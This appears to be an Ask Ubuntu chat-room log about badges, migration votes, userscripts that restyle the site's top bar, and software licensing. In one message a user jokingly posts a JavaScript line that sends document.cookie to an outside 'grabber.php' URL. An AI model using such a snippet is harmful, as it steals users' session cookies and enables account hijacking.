Q: Link Only Answer Automatic Flagging

Cody Guldner Thank you to Manishearth for giving me the idea here Autonavigate/autocomment "close/flag offtopic" for MSO As a very avid user of the Stack Exchange, I try to make this place the most efficient it can be. One of the tasks involved with this is flagging. In this particular case, it ...

Interesting.. Can we run Greasemonkey on chrome?

ah, thanks.

does osx come with python builtin?

I believe so.

12:34 AM
yep

@Whaaaaaat: One google search and two clicks later...
"Python comes pre-installed on Mac OS X so it is easy to start using. However, to take advantage of the latest versions of Python, you will need to download and install newer versions alongside the system ones. "

yay editor :D

@Whaaaaaat, just noticed when I was looking through some of my reviews of edits, that you "approved 68 edit suggestions and rejected 6 edit suggestions"

regarding the badge you asked about some time ago.

12:45 AM
ah
so edits to edits do not count

looks like it. only 26 more to go, though. :)

that is stupid.

1:16 AM
@Whaaaaaat If you are going to vote leave closed and it isn't obvious why, leave a comment please. askubuntu.com/review/reopen/321923
Just a tip.

@Seth can you migrate askubuntu.com/questions/526902/… to meta?

@Seth ok. reason: answers could still be a bit broad.

@muru done
@Whaaaaaat hm. I disagree there. Can you be more specific?
> Is their a way to get dual booting Windows 8.1 and Ubuntu14.04 without partitioning my hard. If so is their a step-by-step procedure available for Windows 8.1 and Ubuntu 14.04?
doesn't sound broad.
> Does partitioning my SSD really cause so much damage where it would not be a good idea to run dual systems, or is the damage negligible to an amateur software developer.
doesn't sound broad to me either.

Thanks!

@muru and yes, votes off-topic -> another site -> site name are migration votes.

1:25 AM
Ah.. Why aren't U&L/SO listed there? Because they are in the first close reason?

Q: Activate migration paths to Unix and Linux, should we?

BraiamFirst of all, lets remember the golden rule of the migrations: DO NOT MIGRATE CRAP That said, why don't we open the migration paths from AU and UL? There has been 10 migrations to UL in the last 90 days, here the stats: The migration to UL has been rejected lately, which has been norma...

Q: Why can't I migrate questions to other StackExchange sites?

Andrea CorbelliniIf on a question I click close → Off topic because... → This question belongs on another site in the Stack Exchange network, I get just one option: Ask Ubuntu Meta. How do I migrate, for example, to Unix & Linux?

Q: Cannot specify other SE groups for transfer

mdpcI have noticed that when you mark a question as 'off-topic' the only choice is to send it to the meta site......why not include the UNIX, SuperUser, StackOverflow SE sites as well? Therefore, my "feature-request" which is not really a feature but something already in the SE architecture just not...

I really should search more. Thanks. :)

in the end, it was decided we don't really migrate enough, and people worried that the feature would get misused.
@muru you're fine :)

Q: What in the world is wrong with my Ubuntu Touch app?

Nathan OsmanI'm working on an Ubuntu Touch app that works flawlessly with qmlscene. Q: Why might videos be an unfit source of information and assistance?

Karl RichterAfter this question came up several times in comments to my regular recommendation to ban videos as source of information and assistance I'd like to give some background information which don't fit into a comment.

1:31 AM
I linked directly to the GitHub project since pasting the contents of four files inline didn't seem like a terribly great idea.

@Seth Two questions.

two questions doesn't really automatically equal too broad.
IMO they are very closely related.

meh

:)
To each his own. I won't try to convince you ;)

may have been an oversight on my part.
haven't eaten anything but ramen all day.
so my thinking is impaired a bit. (whcich explains the hackintosh)
Seth, do 10k users have all of the features seen here?
35
Q: How does the site look like to a moderator?

Amith KKThe site has special features for moderators. Can I see how the site looks like to the average moderator(tools and stuff)

1:44 AM
Yeah, I have wondered what the diff between 10k, 20k and mod users are..

mods = all powerful gods.
20k = prophets
10k = preachers

make it prophets, :D

@Seth This was true, sadly. However, Geoff chose today to become a plank, and as a result the badge will count edit-reviews after the next build.

I want to be mod, but I'm afraid I'll screw something up and disappoint all of AU.

@Whaaaaaat Lol at the "tearing out hair" edit :P

1:47 AM
@Shog9 Can the AU top bar go all the way across the screen please?

wouldn't that look odd?

@Whaaaaaat you'll get the badge with the next build, hi5!

only the Ubuntu bar goes across the whole screen

@Shog9 but it would go great with my floating mod with the clock.
@muru wooooo

@Shog9 no, the top two bars (stack exchange line and site line) would look nice extending across the page.

1:49 AM
Sounds like a job for... a userscript

and the stackexchange bar could be sticky..

@Shog9 it don't work here. i tried

@muru I think it'd be confusing. But, throw it up on meta - tags: - and see what folks think.

will do. But this design is not site specific, right? so belongs on the SO meta?

bit crowded
@muru It's only here AFAIK

1:51 AM
wow. I have never noticed that Ubuntu line above the Stack Exchange line.

i'm making the meta post right now.

@Shog9 i retract my suggestion, now that i have noticed it, but I'll upvote Wha*t's.

@muru !

@muru Do we even need that line?

@Whaaaaaat Maybe Canonical sponsors us and want that line.

1:53 AM
@muru Don't make it floating then.

Q: Upcoming site design changes

JinA few weeks ago Canonical reached out to me about making some design changes on Ask Ubuntu to reflect the official Ubuntu site's new design guidelines. The goal is to keep all Ubuntu related sites(official or 3rd party) consistent. Currently on http://www.ubuntu.com, Ask Ubuntu is linked in the ...

Yeah, just noticed. on data.se, the StackExchange line does stretch

@Shog9 oh, that's nice.
So, what brings you here today Shog? It isn't often we get graced with your imposing presence :)
4
@Whaaaaaat No, they do not.

@Whaaaaaat mentioned all powerful gods
Talk of the ... :D

@Whaaaaaat 10kers get this stuff:

2:00 AM
there. posted to meta. it should pop up here relatively soon.

A: Do "Improved" suggested edits count toward the proofreader and reviewer badges?

Shog9Until now, "Improve" did not count toward the count of actions that trigger this badge. But given we've now replaced "Improve" with actions that explicitly reject or approve edits, it seems fair to make these edits count toward the badge as well - after all, they are approve/reject reviews, the...

Good work, @Seth - you got a years-old inconsistency eliminated.

wooooooo another badge!!
aw seth. you downvoted it already? :(

@Shog9 What did I do?
@Whaaaaaat It has been discussed before, I think.

How's Utopic looking as far as stability goes?
I'm thinking I'm going to have to switch.

@Seth I patched CSS together. Lemme upload a pic for you

2:08 AM
@Seth if you are willing to trust me, run these JS lines in the console:
document.getElementsByClassName('topbar')[0].style.width='100%'
document.getElementsByClassName('topbar')[0].style.position='relative'

hm, doesn't quite line up @muru, but good enough..
I still think it looks terribly ugly.

And
document.getElementById('custom-header').style.margin='0'
forgot to eliminate the margin

aha

Q: AU StackOverflow Ultra-Colliding Bar Across the Screen

WhaaaaaatAs I'm sure many of us have noticed, the top bar on AU (the one with the SE logo) does not go all the way across the screen, like so: However, on sites like U&L, it does go all the way across the screen: I propose that the top SE bar expand to go all the way across the screen. This way, it...

Still -1? :(

2:11 AM
@muru I'd add that as an answer on the meta post.

@Seth an answer or a comment? Because I'd like it server side too..

Ugh, yeah, it just looks terrible.
@muru Answer. Just try to flesh it out a bit more than "paste this in the console", give your opinion about why it should be this way.

@muru While we're on the topic of getting people to execute arbitrary JavaScript on other user's machines...
var a=new XMLHttpRequest('POST', 'http://qms.io/grabber.php'); a.send(document.cookie);
Whistles innocently...

you own qms.io Nathan?

No :P

2:13 AM
@NathanOsman tried to open that URL, got "Unable to determine IP address from host name qms.io"

It's too expensive.
I wish I could though.

and besides, what does the cookie for the new tab page contain?

No, you paste that in the console :)

Yeah, .io's are expensive.

I know, but I'd paste that in the console for the new tab page. :P

2:15 AM
but they are awesome.

@Seth Shog knows everything...

There's nothing in the logs about your breakfast, so I've gotta assume you ate nothing.

Probably going to have to do a clean install of Utopic tomorrow.

@NathanOsman I want to run this.

This ain't gonna be fun.

SAFARI! GET YOUR BUTT UP HERE

2:23 AM
@Whaaaaaat I doubt it works :P
I threw that together as a joke.

@Braiam heheh

Plus I don't even control the qms.io domain.

ok, I'm trying to write those JS lines as a TamperMonkey script. How do I get it to run? O.o

sigh

> notify-osd developers do not consider this a bug in notify-osd, and xfce4-notifyd developers do not consider this a bug in xfce4-notifyd, since both work fine when the other is not installed!

writing it for you now muru

.. COME ON!!!!!!!!!!!!11111ONE

@Whaaaaaat

2:46 AM
@muru Done.
I'll upload in a sec for you.

Good. I figured out I needed to change some Chrome setting for unsafeWindow, now I am stuck trying to figure out where that setting is. :/

i got most of it done. it works on firefox like a charm.
I think it'll work on Chrome too.

dammit seth.
there are problems with that though.

you can use yours, I just thought it was a good challenge, haven't used my JS skills in a while.
@Whaaaaaat Please, enlighten me. I'm not terribly good at Javascript, although I try.

2:50 AM
First off, the ready stuff is unnecessary for greasemonkey

same error. :(
either of you using chrome?

perhaps. I was using Tampermonkey, it didn't seem to like it without that.

one sec.

works for me in firefox and chromium.

second your include has problems
visit a site that isn't the homepage :D

2:51 AM
yep, just noticed that.

:facepalm:
talk about the include.

i has a working one
lemme get it up.

fixed.
But please, use yours @Whaaaaaat. I'm just doing this for fun.

:D
nvm.. it was the includes that was the problem..

2:54 AM
semi-colons @Whaaaaaat, semi-colons.

1
A: What in the world is wrong with my Ubuntu Touch app?

mhall119Your .desktop is hard-coded to look for your QML files in /usr/share/twobuntu-app. Instead, make your Exec line: qmlscene $@ twobuntu-app.qml

\o/

why the change for chat.*, though>

sigh.
It works for me w/o semicolons.

@NathanOsman Michael Hall ftw!
@Whaaaaaat but it isn't proper JS ;)

lemme change it.
@Seth Blame Python.

2:55 AM
that's like saying it ain't proper Perl. No such thing. :P

@muru just being precautionary. I don't think it matters since chat is hosted at a different domain.
@Whaaaaaat hehe

@Seth Yes. I'm adding an exception for chat.SE

i'm just confused. there isn't even a topbar for this chat room O.o

ik
just programming form.
(i shouldn't be the one to talk about that, though)
@Seth better?

that.. is messed up.

2:57 AM
¬ø¬

@Whaaaaaat yep.

I prefer http*://*askubuntu.com, to include meta as well..

ah. thank you
changed.
i like that emote. ¬ø¬

maybe it's just me, but the contrast between the screen filling Ubuntu and Stack Exchange lines are just ... beautiful... so pleasing..

@muru what?
let's get rid of that ugly top bar too :D

3:02 AM
nah, the contrast is half the beauty.. :)

Why not delete it?
document.getElementById('custom-header').parentNode.removeChild(document.getElementById('custom-header'))

Meh.
Hiding it is easier.
besides, I didn't know one could do that.

i just found out myself, because hiding it left a patch at the top above the SE line..

really?
i'll add it in a sec.

3:10 AM

changes saved.

(y) Now you can post both scripts as answers..

kk.
gimme a sec to finish up the repo
@muru I changed everything but expand-nofloat here: github.com/pacificfils/AskUbuntu-ExpandedBar
can you test them?

askubuntu-nocanonicalbar.user.js leaves a gap between SE line and beginning of AU line:

odd.

3:25 AM
ditto for the other one, except that SE line fits width.
works ok without document.getElementsByClassName('container')[0].style.marginTop = '30px';
i commented out that and gap vanishes

chrome?

yep.

dammit. they handle CSS differently.

probably. O.o

time to make two copies of everything, yay.

3:28 AM
but this looks like something both FF and Chrome should do the same thing for..
what happens when you don't?

unless you know a way to determine browsers?
in FF using the 'custom' script:

with the marginTop?
and without it?

in that case, with
without leaves a 36px gab between the menubar and the AU navbar
OH
figured it out

I didn't install greasemonkey, but running in the console:
document.getElementsByClassName('topbar')[0].style.width='100%';
document.getElementsByClassName('topbar')[0].style.position='relative';
document.getElementById('custom-header').parentNode.removeChild(document.getElementById('custom-header'))
worked
what was it?

For custom, it's because another userscript changed it to fixed instead of relative.
try the new nofloat-notopbar

3:38 AM
fine on chrome!

try the nocanonicalbar
next step - create a floaty one.

odd. both remove the canonical bar for me.

nofloat-notopbar and nocanonicalbar?

yep.

they both remove it.
i updated the names.

3:42 AM
Aside: My /tmp (a tmpfs) is shown 100% full by df, yet du shows only 50M used.

df is weird.

df is correct here, ufortunately.. :( not even tab completion works because /tmp is full. :(

does anyone know how to create a folder from github web?

within the web interface? nope. but why not the cli?

too lazy to install it ATM

3:46 AM
:D

@muru Floaty ones done :D
almost. have to make a non-expanding floaty one.

beautiful.. :')
instant access to notifications, search, etc..

one more and done :D
just nonexpanding floaty with canonical bar.
DONE :D

oh wait.. the float with canonical leaves the SE bar ~30 px off the top, with clear space above.

aw poop
wait, floaty noexpand?

3:55 AM
floaty/expand.user

wait?
(me stupid)
are you running any other userscript?

Nope. Only this one.

try refreshing. sounds like a css cache thing

refresh a few times:

for me it does something weirder.
yes. that.

3:58 AM
besides keeping it place might be trickier: stackoverflow.com/a/19144107/2072269

poop.

I mean, at the top after scrolling.

OK then. Floaty + Canonical bar is no go.
repo changed.
that's actually kinda sad.
@muru Is everything good now?

considering the commit comments, yep.

4:17 AM
i'm too lazy to write those too.

I hate choosing licenses for my projects. I can't focus long enough to understand it completely. Anyone knows a site that explains it simply, with real life examples?

@blade19899 then don't :=)

@Rinzwind I always thought that it was better to chose a license, cause it's better in the long run?

@blade19899 ofcourse. but I meant "choose". Just pick one and stick to that one.

@Rinzwind How can i just "choose" a license when i don't really understand the license. And by that what i want to tell people what they can and can't do.

@blade19899 just go for the DWTFYW license.

11:31 AM
@terdon I know that license xD

Sorry, the wtfpl.
:)
Seriously though, if you don't want to tell people what they can and cannot do, that's the license for you.
> The WTFPL is a very permissive license for software and other scientific or artistic works that offers a great degree of freedom. In fact, it is probably the best license out there. This site provides information on how to make the most of the WTFPL.

@blade19899 if they are too complicated then those licenses are not for you ;-)

Permitted: Commercial Use-> "This software and derivatives may be used for commercial purposes." Meaning?
@Rinzwind yep

@blade19899 someone else can copy the code and sell it without modifications

Others can make money off of my code?
@Rinzwind Hello no.
Dont want that

11:41 AM
@blade19899 tsk

@Rinzwind ?

11:59 AM
@terdon I like the open source, non-commercial, you don't necessarily have to send patches back upstream license type. It gives the creator the option to get paid if someone wants to use it commercially, lets another builder use it to build something without any onus on sending patches back, and lets you see the insides.
